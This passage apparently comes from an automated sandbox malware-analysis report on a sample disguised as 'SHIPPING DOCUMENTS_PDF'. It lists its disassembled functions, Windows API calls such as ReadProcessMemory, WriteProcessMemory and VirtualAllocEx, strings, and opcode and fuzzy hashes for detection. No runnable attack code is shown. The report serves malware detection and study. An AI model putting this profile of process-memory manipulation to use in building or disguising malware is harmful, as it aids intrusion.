                                                                                    • Instruction Fuzzy Hash: F3A166756043019FCB10DF14C894E6ABBE5FF89314F148998F89A9B3A2CB71EC49CB91
                                                                                    Function 00B7501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00B750AD
                                                                                      • Part of subcall function 00B800F0: __87except.LIBCMT ref: 00B8012B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                                                                    • Instruction ID: 31d1a51c79c1af23fe5d4efa5cf1fc56d1fb1c18a15fcc8439d52f06f6a00a47
                                                                                    • Opcode Fuzzy Hash: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                                                                    • Instruction Fuzzy Hash: 84515A2192C60186DB617B24C84536E2BD4EB41790F30CDD9F4E9862B9DFB489D8DB86
                                                                                    Function 00B66192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$_memmove
                                                                                    • String ID: ERCP
                                                                                    • API String ID: 2532777613-1384759551
                                                                                    • Opcode ID: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                                                                    • Instruction ID: b3f22c91f5a50c8d084488386683625b3cd80e936139b3f2b96bb2570f400acd
                                                                                    • Opcode Fuzzy Hash: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                                                                    • Instruction Fuzzy Hash: 2F51A171900305DBDB24DF69C881BAAB7E4EF44304F2085BEE95AD7291E774EA44CB40
                                                                                    Function 00BA97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BB14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA9296,?,?,00000034,00000800,?,00000034), ref: 00BB14E6
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA983F
                                                                                      • Part of subcall function 00BB1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00BB14B1
                                                                                      • Part of subcall function 00BB13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00BB1409
                                                                                      • Part of subcall function 00BB13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB1419
                                                                                      • Part of subcall function 00BB13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB142F
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98AC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                                                                    • Instruction ID: dd9fc8ce328a927a6e325164ee9a9d4aea107a5927c62c1f26b395bed1f9315b
                                                                                    • Opcode Fuzzy Hash: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                                                                    • Instruction Fuzzy Hash: B7415E76901218BFCB10DFA4CC91AEEBBB8EB4A300F004099FA45B7181DA706E45DFA0
                                                                                    Function 00BD7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BDF910,00000000,?,?,?,?), ref: 00BD79DF
                                                                                    • GetWindowLongW.USER32 ref: 00BD79FC
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD7A0C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                                                                    • Instruction ID: 5101f1b6e48fde0a9a2a7e80d0997dadb1b46dfb2ea8d3cf988a6908cefe8b82
                                                                                    • Opcode Fuzzy Hash: a15309a198abc8e252ea6879365d2220ace69ea9a51811b49ac5eb439ca4ff50
                                                                                    • Instruction Fuzzy Hash: FA31D032245606AFDB118F38CC55BEABBE9EB05324F244766F875932E0FB34E9508B50
                                                                                    Function 00BD73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BD7461
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BD7475
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD7499
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                                                                    • Instruction ID: 374f026e74393a4684ad241af2259846ac52cfbbe69f840a0befdebc89360c77
                                                                                    • Opcode Fuzzy Hash: d341b71204918a275d8c6e73dd7fe0c8a818b7a24855a2d3fa00c176781f69fb
                                                                                    • Instruction Fuzzy Hash: 3521B132540219ABDF228E54CC42FEA7BA9EB48724F110155FE156B2D0EAB5AC50CBA0
                                                                                    Function 00BD7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BD7C4A
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BD7C58
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BD7C5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                                                                    • Instruction ID: 1d5a301672e4ea536bbeef4e9993a2a94425109c286d9a6451fa7d5c3e3da091
                                                                                    • Opcode Fuzzy Hash: b2edff2eb0675c252e78caf759205ecf1338c47cdbd68b4b6c380d34d2643f38
                                                                                    • Instruction Fuzzy Hash: 782181B1644109AFDB10DF28DCD1DAA77ECEF4A354B14409AF9019B3A1EB31EC01CB60
                                                                                    Function 00BD6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BD6D3B
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BD6D4B
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BD6D70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                                                                    • Instruction ID: 8b3e0d7425d947483f8a90e35f773cb15e71805d41bf2fa73329912e9458e007
                                                                                    • Opcode Fuzzy Hash: c0add64a4fd5ece4c5b6a378f99d5a39c621864b91d541d9bd7bd0b5a185c05a
                                                                                    • Instruction Fuzzy Hash: 1B21FF32611118BFDF118F54DC81FBB7BBAEF89760F01817AF9459B2A0DA719C518BA0
                                                                                    Function 00BD770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BD7772
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BD7787
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BD7794
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                                                                    • Instruction ID: b7585adfff18779a87cc83b030cf1d1bded16ba2ccbfb5fa9af40968050eaa0a
                                                                                    • Opcode Fuzzy Hash: 0eab540b05734c8d98a05b64351b7b64d3f079864e08f200cdb70d505f098050
                                                                                    • Instruction Fuzzy Hash: 6C113A32244208BFEF209F64CC01FEBB7ACEF88B54F014529FA45921D0E671E811CB10
                                                                                    Function 00B54C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54B83,?), ref: 00B54C44
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B54C56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                                                                    • Instruction ID: c34a280f92bc41490b39c5d1ba6565619c14217f32d2cbf9dfe6ab48e21a7112
                                                                                    • Opcode Fuzzy Hash: f0731d1644abdba0c589e7530e9ea670c041fa9ab541a08bc87a844837b37390
                                                                                    • Instruction Fuzzy Hash: ECD01730515713CFD7209F31D91876AB7E4EF05356B1588BB99A6E62A8FB70D8C0CA50
                                                                                    Function 00B54C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00B54BD0,?,00B54DEF,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54C11
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B54C23
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                                                                    • Instruction ID: 8e9b605322e2deee92dc4a21e08d3de061364cb300e0839cd43ee792fd3bc8a8
                                                                                    • Opcode Fuzzy Hash: 55f980cfe092f9e9cdcdf006ab5fa5af7ea13e688167a23095e177028297eba6
                                                                                    • Instruction Fuzzy Hash: 88D0E23051A713CFD720AB75D918716BAE5EF09356B1588BA9896E62A0EBB0D880CA50
                                                                                    Function 00BD0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00BD1039), ref: 00BD0DF5
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BD0E07
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                                                                    • Instruction ID: f16e1c854a46aefbf71fbcea9758d87530029ceca0d95306f9e17867c57a5dbc
                                                                                    • Opcode Fuzzy Hash: 7285ba4fde11712f8d245c7565a91b3bace92bc7c311b296c8560b785034bdeb
                                                                                    • Instruction Fuzzy Hash: E9D0E270920723CFD720AB76C80879AB7E9EF05352F158C7E9496E2291EAB0D890CB55
                                                                                    Function 00BC90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00BC8CF4,?,00BDF910), ref: 00BC90EE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BC9100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                                                                    • Instruction ID: 408f08244ae180e28812bb7fcd559b90964d8554315b4c8402260c5a775e79a0
                                                                                    • Opcode Fuzzy Hash: 24886207c0776fc3784951df306c2451fde32d3dd8da85126bbfd0110f170639
                                                                                    • Instruction Fuzzy Hash: E8D0E234514713DFEB209B71D82EA16B6E5AF05391B1A887E9496E66A0FA70C880CA90
                                                                                    Function 00B91714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                                                                    • Instruction ID: 5cc1f600550b080715ba3f69ea6ad365b285f45175cf917994d6b8e5704a80e7
                                                                                    • Opcode Fuzzy Hash: d0fd03971af4a4d79072ab53e0fa16e253737b71d0220265ade060464a98d096
                                                                                    • Instruction Fuzzy Hash: 2DD012F180910BEACF0097D498D89B977FCA708701F5008F2B506A3090E6398F54F621
                                                                                    Function 00BA717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                                                                    • Instruction ID: b942e7c42c7d116a0d68ac9b7b14216c748dfce02ae8281af500d7588edb0ed2
                                                                                    • Opcode Fuzzy Hash: 3a4f3bdc08197bd41849ae9ccec9c3507daca1aa930c13246b1f068288b0907a
                                                                                    • Instruction Fuzzy Hash: 55C13875A0C216AFCB14CFA4C884AAEBBF5FF49714B158598E805EB351DB30ED81DB90
                                                                                    Function 00BCE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BCE0BE
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00BCE101
                                                                                      • Part of subcall function 00BCD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00BCE301
                                                                                    • _memmove.LIBCMT ref: 00BCE314
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3659485706-0
                                                                                    • Opcode ID: 6385dde5da3b54c674ab7e6650d6ba0fd9053395fa3b4f84ad437e8361d3e588
                                                                                    • Instruction ID: 0fa2c1c6b4ddf5a84ce3be9ed35011938ac0c929ed66de728885e94e8b574c93
